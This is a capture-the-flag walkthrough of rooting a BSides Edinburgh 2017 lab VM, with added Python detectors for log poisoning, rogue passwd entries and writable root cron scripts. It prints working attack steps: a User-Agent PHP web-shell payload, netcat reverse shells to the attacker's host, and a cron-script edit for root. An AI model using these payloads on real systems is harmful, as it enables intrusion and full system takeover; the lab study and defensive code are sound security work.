BSides Edinburgh 2017 CTF Walkthrough

a guest
Apr 17th, 2017
BSides Edinburgh 2017 CTF Walkthrough - https://maze.pentest-challenge.co.uk/ - DigiP

Currently scanning: 192.168.7.0/16 | Screen View: Unique Hosts

277 Captured ARP Req/Rep packets, from 4 hosts. Total size: 16620
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------

192.168.1.89 08:00:27:31:b6:3a 4 240 PCS Systemtechnik GmbH

root@kali:~# nmap -sC -sV -T5 -v -p- --open -Pn --script vuln 192.168.1.89

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /manager/: Possible admin folder
| /test.html: Test page
| /test.php: Test page
| /robots.txt: Robots file
|_ /uploads/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|_http-server-header: Apache/2.4.10 (Debian)
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 08:00:27:31:B6:3A (Oracle VirtualBox virtual NIC)


/test.php has an interesting message:

"Access Log (Cleared every 5 minutes):"

Let's try storing some PHP. The home page reads our User-Agent, so we set it to the following,

<?php system("ls -lashR /") ?>

then visit /test.php.

As suspected, we get a listing of all the files on the system (that the current user can read).

We find the log at http://192.168.1.89/9didkaskdhjdfh44/log.txt, and it contains the PHP code from our User-Agent verbatim.

We send the following to create our PHP payload in /uploads (the log below also shows the earlier User-Agent that copied log.txt into /uploads/foo.php):

curl -v --user-agent '<?php system($_GET["cmd"]) ?>' http://192.168.1.89/

/log.txt output:

192.168.1.66:<?php system("cp /var/www/html/9didkaskdhjdfh44/log.txt /var/www/html/uploads/foo.php") ?><br />192.168.1.66:<?php system($_GET["cmd"]) ?><br />

Then navigate to test.php, and then to /uploads/foo.php.

We can now send commands to this page without playing with our User-Agent.

view-source:http://192.168.1.89/uploads/foo.php?cmd=cat%20/etc/passwd
(Edit: I copied foo.php to shell2.php, as the first time around I forgot about the log copying, and it ended up wiping foo.php out somehow, leaving a blank file.)
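The weakness used above is that a request header is written unescaped into a file that the server later runs through the PHP interpreter. The following is an added example, not code from the walkthrough or the challenge, showing two things a defender would want: a detection pass over access-log entries that flags PHP open tags and shell functions smuggled in via User-Agent, and a logging helper that HTML-encodes the header before storing it so the stored text can never be parsed as a PHP tag. The log format ("ip:user-agent") and the sample lines are constructed to mirror the log.txt output shown on this page; the function names are mine.

```python
import html
import re
from typing import Dict, List

# Constructed sample of the challenge's "ip:user-agent" log format (made-up entries).
SAMPLE_LOG_LINES = [
    "192.168.1.66:Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/52.0",
    "192.168.1.66:curl/7.52.1",
    '192.168.1.66:<?php system($_GET["cmd"]) ?>',
    "192.168.1.66:<?= `id` ?>",
    "192.168.1.66:<script>alert(1)</script>",
]

# "<?php", the short echo tag "<?=" and the bare "<?" open tag; PHP honours the
# latter depending on short_open_tag, so all three are treated as suspicious.
PHP_TAG_RE = re.compile(r"<\?(php|=)?", re.IGNORECASE)
# Functions that hand a string to a shell; their presence in a header is a strong signal.
SHELL_FUNC_RE = re.compile(r"\b(system|exec|passthru|shell_exec|popen)\s*\(", re.IGNORECASE)


def parse_line(line: str) -> Dict[str, str]:
    """Split one 'ip:user-agent' line; the user agent may itself contain colons."""
    ip, _, ua = line.partition(":")
    return {"ip": ip, "user_agent": ua}


def find_poisoned_entries(lines: List[str]) -> List[Dict[str, object]]:
    """Return the entries whose User-Agent carries server-side code, with the reasons."""
    findings: List[Dict[str, object]] = []
    for number, line in enumerate(lines, 1):
        entry = parse_line(line)
        reasons = []
        if PHP_TAG_RE.search(entry["user_agent"]):
            reasons.append("php-open-tag")
        if SHELL_FUNC_RE.search(entry["user_agent"]):
            reasons.append("shell-function")
        if reasons:
            findings.append({"line": number, "ip": entry["ip"], "reasons": reasons,
                             "user_agent": entry["user_agent"]})
    return findings


def safe_log_entry(ip: str, user_agent: str, max_len: int = 256) -> str:
    """Encode a header value before it is stored for later display.

    html.escape turns '<' into '&lt;', so even if the log file is ever served
    through the PHP interpreter the stored text cannot open a PHP tag. Newlines
    are also removed so one request cannot forge additional log records."""
    ua = user_agent[:max_len].replace("\r", " ").replace("\n", " ")
    return f"{ip}:{html.escape(ua, quote=True)}"


if __name__ == "__main__":
    for hit in find_poisoned_entries(SAMPLE_LOG_LINES):
        print(f"line {hit['line']} from {hit['ip']}: {', '.join(hit['reasons'])}")
    print(safe_log_entry("192.168.1.66", '<?php system("id") ?>'))
```

Encoding is defence in depth only; the root cause is that the log lives under the web root and is later included or copied into a path the interpreter executes. Keeping such logs outside the document root and never executing uploaded or logged content removes the primitive entirely.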

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
ctfuser:x:1000:1000:ctfuser,,,:/home/ctfuser:/bin/bash
mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
r00t::0:0:0wned:/home/r00t:/bin/sh
r00t::0:0:0wned:/home/r00t:/bin/sh

There is an odd user in /etc/passwd, listed twice, named "r00t" (with zeros, not o's).

/etc/group:

root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:ctfuser
floppy:x:25:ctfuser
tape:x:26:
sudo:x:27:
audio:x:29:ctfuser
dip:x:30:ctfuser
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:ctfuser
sasl:x:45:
plugdev:x:46:ctfuser
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
input:x:101:
systemd-journal:x:102:
systemd-timesync:x:103:
systemd-network:x:104:
systemd-resolve:x:105:
systemd-bus-proxy:x:106:
crontab:x:107:
netdev:x:108:ctfuser
Debian-exim:x:109:
messagebus:x:110:
mlocate:x:111:
ssh:x:112:
ctfuser:x:1000:
ssl-cert:x:113:
mysql:x:114:

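The "r00t" lines in the /etc/passwd listing above are exactly what a host-integrity check should catch: a second UID 0 account, an empty password field, a duplicate entry, and a name chosen to look like root. The following is an added example (not part of the walkthrough) of a small passwd(5) auditor that reports those conditions; the excerpt it runs on is constructed from the listing above and the function names are mine.

```python
from typing import Dict, List

# Constructed excerpt of the /etc/passwd listing above (sample input, not the full file).
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
ctfuser:x:1000:1000:ctfuser,,,:/home/ctfuser:/bin/bash
r00t::0:0:0wned:/home/r00t:/bin/sh
r00t::0:0:0wned:/home/r00t:/bin/sh
"""

FIELDS = ("name", "pw", "uid", "gid", "gecos", "home", "shell")


def parse_passwd(text: str) -> List[Dict[str, str]]:
    """Split passwd(5) lines into dicts; malformed lines are kept and marked."""
    entries: List[Dict[str, str]] = []
    for raw in text.splitlines():
        if not raw.strip() or raw.startswith("#"):
            continue
        parts = raw.split(":")
        if len(parts) != len(FIELDS):
            entries.append({"name": raw, "malformed": "1"})
            continue
        entries.append(dict(zip(FIELDS, parts)))
    return entries


def audit_passwd(text: str) -> List[str]:
    """Return one human-readable finding per anomaly, in file order."""
    findings: List[str] = []
    seen = set()
    for e in parse_passwd(text):
        if "malformed" in e:
            findings.append(f"malformed line: {e['name']}")
            continue
        name = e["name"]
        if name in seen:
            findings.append(f"duplicate account name: {name}")
        seen.add(name)
        # Any extra UID 0 account is a second root, whatever it is called.
        if e["uid"] == "0" and name != "root":
            findings.append(f"extra UID 0 account: {name}")
        # The normal value is "x" (hash lives in /etc/shadow). An empty field
        # means no hash at all; PAM setups that permit null passwords will
        # accept a login with no password for this account.
        if e["pw"] == "":
            findings.append(f"empty password field: {name}")
        # Names that imitate root with digit look-alikes, e.g. r00t.
        if name != "root" and name.lower().replace("0", "o") == "root":
            findings.append(f"root look-alike name: {name}")
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(finding)
```

On a live system the same function can be pointed at the real file with `audit_passwd(open("/etc/passwd").read())`; a clean Debian install returns an empty list, so any output is worth a look.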
We start a reverse shell with /bin/nc back to our machine.

We issue:
cat /etc/issue;cat /etc/*ele*;uname -a
The IP address assigned to the VM is \4{eth0}. Have fun!


██████╗ ███████╗███╗ ██╗████████╗███████╗███████╗████████╗
██╔══██╗██╔════╝████╗ ██║╚══██╔══╝██╔════╝██╔════╝╚══██╔══╝
██████╔╝█████╗ ██╔██╗ ██║ ██║ █████╗ ███████╗ ██║
██╔═══╝ ██╔══╝ ██║╚██╗██║ ██║ ██╔══╝ ╚════██║ ██║
██║ ███████╗██║ ╚████║ ██║ ███████╗███████║ ██║
╚═╝ ╚══════╝╚═╝ ╚═══╝ ╚═╝ ╚══════╝╚══════╝ ╚═╝

██████╗████████╗███████╗
██╔════╝╚══██╔══╝██╔════╝
██║ ██║ █████╗
██║ ██║ ██╔══╝
╚██████╗ ██║ ██║
╚═════╝ ╚═╝ ╚═╝

██████╗ ██████╗ ██╗███████╗
╚════██╗██╔═████╗███║╚════██║
█████╔╝██║██╔██║╚██║ ██╔╝
██╔═══╝ ████╔╝██║ ██║ ██╔╝
███████╗╚██████╔╝ ██║ ██║
╚══════╝ ╚═════╝ ╚═╝ ╚═╝


The IP address assigned to the VM is \4{eth0}. Have fun!


PRETTY_NAME="Debian GNU/Linux 8 (jessie)"
NAME="Debian GNU/Linux"
VERSION_ID="8"
VERSION="8 (jessie)"
ID=debian
HOME_URL="http://www.debian.org/"
SUPPORT_URL="http://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
Linux ctf 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1 (2016-12-30) x86_64 GNU/Linux

I check netstat -antplu while in the shell:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 192.168.1.89:36495 192.168.1.66:443 ESTABLISHED 19102/sh
tcp6 0 0 ::1:25 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 1 0 192.168.1.89:80 192.168.1.66:50218 CLOSE_WAIT -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
udp 0 0 0.0.0.0:1203 0.0.0.0:* -
udp6 0 0 :::45629 :::* -

Let's get a proper tty:
python -c 'import pty; pty.spawn("/bin/sh")'

www-data@ctf:/home/ctfuser$ cat clearlog.sh
cat clearlog.sh
#!/bin/sh
echo '' > /var/www/html/9didkaskdhjdfh44/log.txt
www-data@ctf:/home/ctfuser$

We find the script that appears to be clearing the User-Agents out of log.txt. If we can write to this file, we may be able to elevate to root.

We can't write to the file in ctfuser's home as www-data, so I looked for other scripts with bad permissions, but found none: the only rwxrwxrwx hits are symlinks in the rc directories (a symlink's own mode is always 777; the target's permissions are what count).
www-data@ctf:/home/ctfuser$ find / ! -ls 2>/dev/null | grep "\.sh$" | grep rwxrwxrwx
5430 0 lrwxrwxrwx 1 root root 21 Feb 2 14:40 /etc/rcS.d/S17bootmisc.sh -> ../init.d/bootmisc.sh
5372 0 lrwxrwxrwx 1 root root 21 Jan 28 03:20 /etc/rcS.d/S09mountall.sh -> ../init.d/mountall.sh
5338 0 lrwxrwxrwx 1 root root 32 Jan 28 03:20 /etc/rcS.d/S08checkroot-bootclean.sh -> ../init.d/checkroot-bootclean.sh
5481 0 lrwxrwxrwx 1 root root 20 Jan 28 03:20 /etc/rcS.d/S05hwclock.sh -> ../init.d/hwclock.sh
5368 0 lrwxrwxrwx 1 root root 20 Jan 28 03:20 /etc/rcS.d/S07checkfs.sh -> ../init.d/checkfs.sh
5278 0 lrwxrwxrwx 1 root root 24 Jan 28 03:19 /etc/rcS.d/S01mountkernfs.sh -> ../init.d/mountkernfs.sh
5376 0 lrwxrwxrwx 1 root root 31 Jan 28 03:20 /etc/rcS.d/S10mountall-bootclean.sh -> ../init.d/mountall-bootclean.sh
5429 0 lrwxrwxrwx 1 root root 31 Feb 2 14:40 /etc/rcS.d/S14mountnfs-bootclean.sh -> ../init.d/mountnfs-bootclean.sh
5332 0 lrwxrwxrwx 1 root root 21 Jan 28 03:19 /etc/rcS.d/S01hostname.sh -> ../init.d/hostname.sh
5336 0 lrwxrwxrwx 1 root root 22 Jan 28 03:20 /etc/rcS.d/S06checkroot.sh -> ../init.d/checkroot.sh
5334 0 lrwxrwxrwx 1 root root 26 Jan 28 03:20 /etc/rcS.d/S04mountdevsubfs.sh -> ../init.d/mountdevsubfs.sh
5428 0 lrwxrwxrwx 1 root root 21 Feb 2 14:40 /etc/rcS.d/S13mountnfs.sh -> ../init.d/mountnfs.sh
5442 0 lrwxrwxrwx 1 root root 22 Jan 28 03:37 /etc/rc6.d/K05umountnfs.sh -> ../init.d/umountnfs.sh
5480 0 lrwxrwxrwx 1 root root 20 Jan 28 03:37 /etc/rc6.d/K07hwclock.sh -> ../init.d/hwclock.sh
5441 0 lrwxrwxrwx 1 root root 22 Jan 28 03:37 /etc/rc0.d/K05umountnfs.sh -> ../init.d/umountnfs.sh
5478 0 lrwxrwxrwx 1 root root 20 Jan 28 03:37 /etc/rc0.d/K07hwclock.sh -> ../init.d/hwclock.sh

echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
www-data@ctf:/var/www/html/uploads$ env
env
APACHE_PID_FILE=/var/run/apache2/apache2.pid
APACHE_RUN_USER=www-data
APACHE_LOG_DIR=/var/log/apache2
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/var/www/html/uploads
APACHE_RUN_GROUP=www-data
LANG=C
SHLVL=1
APACHE_LOCK_DIR=/var/lock/apache2
APACHE_RUN_DIR=/var/run/apache2
_=/usr/bin/env
OLDPWD=/usr/share/gcc-4.9
www-data@ctf:/var/www/html/uploads$


Next, a search for world-writable regular files:

find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null


-rwxrwxrwx 1 root root 26597 Apr 4 11:02 /var/www/html/pentest_logo.jpg
-rwxrwxrwx 1 root root 4301 Apr 4 11:02 /var/www/html/minimal.css
-rwxrwxrwx 1 root root 1667 Apr 5 17:26 /var/www/html/index.php
-rwxrwxrwx 1 root root 35 Apr 6 13:41 /var/www/html/robots.txt
www-data@ctf:/var/www/html$

None of these look useful. index.php is owned by root, but it will always execute as www-data unless root runs it directly. We'd need a root cron job to run it for us, where we could then inject code to pop a shell as root, but no cron job executes this file as root.

Lost my shell at some point, probably fat-fingered something. Re-establishing it:
192.168.1.89/uploads/shell2.php?cmd=nc 192.168.1.66 443 -e /bin/sh
python -c 'import pty; pty.spawn("/bin/sh")';/bin/bash

After a day of playing, looking for a hole or a privilege escalation, I had missed Captain Obvious with regard to ctfuser.

su ctfuser
password? ctfuser

:( wah wah wah


su ctfuser
su ctfuser
Password: ctfuser

ctfuser@ctf:/var/www/html/uploads$ id
id
uid=1000(ctfuser) gid=1000(ctfuser) groups=1000(ctfuser),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
ctfuser@ctf:/var/www/html/uploads$ sudo -l
sudo -l
[sudo] password for ctfuser: ctfuser

Sorry, user ctfuser may not run sudo on ctf.
You have new mail in /var/mail/ctfuser
ctfuser@ctf:/var/www/html/uploads$

Interesting info in /var/mail/ctfuser:


Subject: Cron <root@ctf> /root/scripts/rangen.sh

We start a local listener with nc -nlvp 4444 and then append to clearlog.sh, which we now own as ctfuser:

echo -e 'nc -nv 192.168.1.66 4444 -e /bin/bash' >> clearlog.sh

This script, if it's what I think it is, runs every 5 minutes, as stated on the test.php page we used to gain our www-data shell.
If root starts this process, we should get a reverse shell as root.
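The privilege escalation here is a root cron job executing a script that a non-root account can edit. That is a configuration fault an administrator can check for mechanically: for every job that runs as root, resolve the script it executes and verify that nobody but root can modify it (or its parent directory). The following is an added example written for this page, not code from the walkthrough or the challenge. It parses /etc/crontab-style lines, then constructs a throwaway directory containing a world-writable clearlog.sh (modelled on the one above, but created locally for the demo) so it can be run anywhere; the function names are mine.

```python
import os
import shlex
import stat
import tempfile
from typing import Dict, List, Optional

# Interpreters whose real payload is the script given as the next argument.
INTERPRETERS = {"sh", "bash", "dash", "python", "python2", "python3", "perl"}


def jobs_from_crontab(text: str, system_crontab: bool = True) -> List[Dict[str, Optional[str]]]:
    """Return {"user", "command"} for each job line.

    /etc/crontab and /etc/cron.d/* carry a user field after the five time
    fields; a per-user crontab (crontab -l) does not. Comments, environment
    assignments and @reboot-style shortcuts are skipped for brevity."""
    jobs: List[Dict[str, Optional[str]]] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("@"):
            continue
        if "=" in line.split()[0]:          # e.g. PATH=... or MAILTO=...
            continue
        want = 7 if system_crontab else 6
        fields = line.split(None, want - 1)
        if len(fields) < want:
            continue
        user = fields[5] if system_crontab else None
        jobs.append({"user": user, "command": fields[-1]})
    return jobs


def script_path(command: str) -> Optional[str]:
    """The first token that is not an interpreter or an option: the file cron really runs."""
    try:
        argv = shlex.split(command)
    except ValueError:
        return None
    for tok in argv:
        if tok.startswith("-") or os.path.basename(tok) in INTERPRETERS:
            continue
        return tok
    return None


def writable_by_non_root(path: str) -> List[str]:
    """Reasons a non-root user could change what root executes at `path`."""
    reasons: List[str] = []
    try:
        st = os.lstat(path)
        if stat.S_ISLNK(st.st_mode):
            reasons.append("symlink")
            st = os.stat(path)            # judge the target, not the link
    except FileNotFoundError:
        return reasons + ["missing"]
    if st.st_uid != 0:
        reasons.append(f"owned by uid {st.st_uid}, not root")
    if st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    parent = os.stat(os.path.dirname(path) or ".")
    # A world-writable, non-sticky directory lets anyone replace the file outright.
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        reasons.append("parent directory world-writable")
    return reasons


def audit_crontab(text: str, system_crontab: bool = True) -> List[Dict[str, object]]:
    """Flag root jobs whose script a lower-privileged user could modify."""
    findings: List[Dict[str, object]] = []
    for job in jobs_from_crontab(text, system_crontab):
        if job["user"] not in (None, "root"):
            continue                        # only root jobs escalate privilege
        path = script_path(job["command"])
        if path is None or not os.path.isabs(path):
            continue                        # relative names depend on cron's PATH; skipped here
        reasons = writable_by_non_root(path)
        if reasons:
            findings.append({"command": job["command"], "path": path, "reasons": reasons})
    return findings


def demo() -> List[Dict[str, object]]:
    """Constructed scenario: a world-writable clearlog.sh in a temp dir, run by a root job."""
    workdir = tempfile.mkdtemp()
    script = os.path.join(workdir, "clearlog.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/sh\necho '' > /var/www/html/9didkaskdhjdfh44/log.txt\n")
    os.chmod(script, 0o777)
    crontab = (
        "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\n"
        f"*/5 * * * * root {script}\n"          # root runs a file it does not control
        f"*/5 * * * * ctfuser {script}\n"       # same file, but not a root job: ignored
    )
    return audit_crontab(crontab)


if __name__ == "__main__":
    for hit in demo():
        print(hit["path"], "->", ", ".join(hit["reasons"]))
```

The fix on the box side is the mirror image of the finding: root-run scripts belong in a root-owned directory such as /root/scripts or /usr/local/sbin with mode 0755 or tighter, never in a user's home directory.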

5 minutes later, and we have root!

python -c 'import pty; pty.spawn("/bin/sh")'
# /bin/bash
/bin/bash
root@ctf:~# cd /root
cd /root
root@ctf:~# ls -la
ls -la
total 48
drwx------ 2 root root 4096 Apr 6 12:57 .
drwxr-xr-x 22 root root 4096 Jan 28 03:20 ..
-rw------- 1 root root 183 Apr 6 13:55 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-r-x------ 1 root root 8096 Feb 24 21:32 flag-gen
---------- 1 root root 93 Apr 6 13:55 flag.txt
-rw------- 1 root root 485 Feb 2 14:28 .mysql_history
-rw------- 1 root root 27 Apr 6 13:55 .nano_history
-rw-r--r-- 1 root root 140 Nov 19 2007 .profile
---------- 1 root root 451 Feb 2 13:43 public_key.pem
-rw-r--r-- 1 root root 66 Jan 30 17:28 .selected_editor
root@ctf:~# cat flag.txt
cat flag.txt
Please run the flag-gen binary in the /root/ folder to generate your unique flag. Well Done!
root@ctf:~# ./flag-gen
./flag-gen
Please supply your name as an argument.
root@ctf:~# ./flag-gen xxDigiPxx
./flag-gen xxDigiPxx
gAUfvCE50nYnABpAPClJtYdhQaLqB3n0oIb/pmaRxmOHm/8JM9nDPhPJrOUnnzUcHfHR5ewAIPGB
EGVjsvPd7YYG9Do16xyTNbP5tfENe50OA7av4kkHUvYOhVgjQfn+RcCYJDUAj3xkA5nwg1DnIBjP
WQcseAgMxnaFE50YJYEQAolWalanygEyNJUp/L2CQODR/KSgdacWBSjPL+zdCtbF5YPjsVHvlijX
WJcNuIs7wlHysMsUadMahRffgSYhv0+gUs9VVT0CB7/2kqlg7CTivS9btjvXicrAN4Fv2Ma2l39I
7SWX6Yt3I/7U4VJXNoVSYUeBwrTTiCKu2dqgQA==
root@ctf:~#

During this CTF I tried way too many things, looking for various exploits for privilege escalation, and came up short. At the end of the day, the simplest of things came back to bite me: using the username as the password was something I should have tried as soon as I had gained my first tty session. Just goes to show that sometimes it's the little things we neglect that have the biggest impact. - DigiP